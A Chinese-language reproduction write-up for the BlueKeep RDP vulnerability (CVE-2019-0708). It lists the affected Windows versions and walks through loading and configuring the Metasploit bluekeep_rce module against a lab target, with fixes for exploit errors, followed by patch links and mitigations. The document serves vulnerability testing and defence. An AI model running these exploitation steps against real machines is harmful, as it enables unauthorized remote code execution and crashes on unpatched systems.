1
漏洞概述
2019年5月14日,微軟發布了針對遠程桌面服務的關鍵遠程執行代碼漏洞CVE-2019-0708的補丁,該漏洞影響某些舊版本的Windows。攻擊者一旦成功觸發該漏洞,便可以在目標系統上執行任意代碼,該漏洞的觸發無需任何用戶交互操作。這就意味著,存在漏洞的計算機只要聯網,無需任何操作,就可能遭遇黑客遠程攻擊,運行惡意代碼。其方式與2017年WannaCry惡意軟體的傳播方式類似。成功利用此漏洞的攻擊者可以在目標系統完成安裝應用程式,查看、更改或刪除數據,創建完全訪問權限的新帳戶等操作。
2
影響範圍
該漏洞影響舊版本的Windows系統,包括:
Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP。
Windows 8和Windows 10及之後版本不受此漏洞影響。
3
漏洞修複測試
測試環境
將下載的exp分別放入或替換:
/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
4
Msf升級
使用命令msfupdate,按提示,apt update;
apt install Metasploit-framework,最後reload_all就可以了。
啟動Metasploit
用search搜索0708,使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce啟用0708RDP模塊攻擊
用show options進行參數設置
這裡只需要設置兩項,set rhosts 目標ip(我這裡是192.168.106.149),以及set target 3
set target ID數字(可選為0-4)設置受害機機器架構,wmware=3,Virtualbox=2
成功利用。
到目前公開的利用代碼可用於攻擊 Windows 7 SP1 x64 與 Windows 2008 R2 x64的EXP不太穩定,針對 Windows 7 SP1 x64攻擊有藍屏現象。
復現過程中出現的一些問題解決方法:
如提示Exploit failed: NameError undefined local variable or method `rdp_connect' for,則需要替換下載的exp(4個rb文件);
如提示ForceExploit錯誤,需要將ForceExploit設置為true;
Windows2008 R2 x64 需要修改[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TerminalServer\WinStations\rdpwd\fDisableCam]值為0。
5
修復漏洞更新補丁
安裝微軟的安全更新來給系統打上安全補丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
同時針對已不受微軟更新支持的系統Windows Server 2003和Windows XP提供的安全更新,下載地址:
https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708
緩解措施(在無法及時安裝微軟安全更新的情況下作為臨時性解決方案)
1.若用戶不需要用到遠程桌面服務,建議禁用該服務。
2.開啟網絡級別身份驗證(NLA),此方案適用於Windows 7, Windows Server 2008, Windows Server 2008 R2。
以上措施只能暫時性針對該漏洞對系統進行部分緩解,強烈建議在條件允許的情況下及時安裝微軟安全更新。
6
相關參考
@rapid7 Add initial exploit for CVE-2019-0708, BlueKeep #12283